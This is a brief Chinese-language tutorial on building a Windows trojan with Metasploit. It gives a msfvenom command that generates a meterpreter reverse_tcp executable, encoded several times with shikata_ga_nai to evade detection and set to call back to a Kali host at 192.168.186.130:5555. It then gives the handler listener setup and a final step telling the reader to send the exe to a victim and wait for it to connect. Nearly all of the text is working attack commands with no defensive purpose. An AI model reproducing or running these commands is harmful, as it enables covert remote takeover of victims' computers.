Metasploit之windows木马
KALI IP:192.168.186.130
1.生成windows木马
msfvenom -p windows/meterpreter/reverse_tcp -e x64/shikata_ga_nai -i 5 -b '0x00' LHOST=192.168.186.130 LPORT=5555 -f exe > muma.exe命令参数介绍
-e x64/shikata_ga_nai \\如果对方电脑是32位参数位x86,64位参数为x64 -i 5 \\编码次数 -f exe \\生成的文件后缀 - LHOST \\KALI IP - LPORT \\监听端口

2.启动metasploit进行监听
msfconsole3.使用handeler模块
use exploit/multi/handler4.设置监听参数
set payload windows/meterpreter/reverse_tcp set lhost 192.168.186.130 \\kali IP set lport 5555 \\端口

5.开始攻击,将生成的exe文件发送给受害者坐等上线。
exploit

发表评论